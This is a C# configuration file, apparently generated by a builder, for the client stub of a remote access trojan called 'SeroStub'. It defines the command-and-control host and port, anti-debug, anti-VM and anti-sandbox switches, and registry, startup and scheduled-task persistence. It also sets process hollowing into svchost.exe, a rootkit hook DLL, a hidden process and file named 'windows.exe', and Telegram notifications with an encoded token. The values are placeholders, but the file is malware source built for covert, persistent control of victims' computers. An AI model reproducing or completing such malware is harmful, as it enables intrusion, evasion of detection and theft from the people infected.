namespace SeroStub;

// !! THIS FILE IS AUTO-GENERATED BY THE BUILDER !!
// Do not edit manually — every Build click overwrites it.
// Commit only with placeholder values (all secrets must be empty).

internal static class Config
{
    public static readonly string[] Hosts = new[] { "127.0.0.1" };
    public const int Port = 7777;
    public const bool UseMutex = true;
    public const string MutexName = "";

    public const bool AntiDebug  = false;
    public const bool AntiVM     = false;
    public const bool AntiDetect = false;
    public const bool AntiSandbox= false;

    public const bool PersistRegistry = false;
    public const bool PersistStartup  = false;
    public const bool PersistTask     = false;
    public const string PersistName   = "windows";

    public const bool AntiKill       = false;
    public const bool EnableWatchdog  = false;
    public const bool EnableHollowing = false;
    public const string HollowTarget  = "svchost.exe";

    public const string AuthKey  = "";   // injected by builder
    public const string CertHash = "";   // injected by builder

    // Unique per build — injected by builder
    public const string BuildId = "";

    public const int ReconnectDelayMs   = 5000;
    public const int HeartbeatIntervalMs = 3000;

    public const string ClientIdPrefix = "";

    public const string HiddenProcessName = "windows";
    public const string HiddenFileName    = "windows.exe";

    public const bool EnableRootkit = false;
    public static readonly byte[] HookDllBytes   = Array.Empty<byte>();
    public static readonly byte[] HookDllBytes32 = Array.Empty<byte>();

    // Telegram notification (SFC64-encoded — injected by builder, never plaintext)
    public const bool TelegramEnabled = false;
    public static readonly byte[] TelegramTokenSfc   = Array.Empty<byte>();
    public static readonly byte[] TelegramChatId1Sfc = Array.Empty<byte>();
    public static readonly byte[] TelegramChatId2Sfc = Array.Empty<byte>();
    public static readonly byte[] TelegramSfcSeed    = Array.Empty<byte>();
}
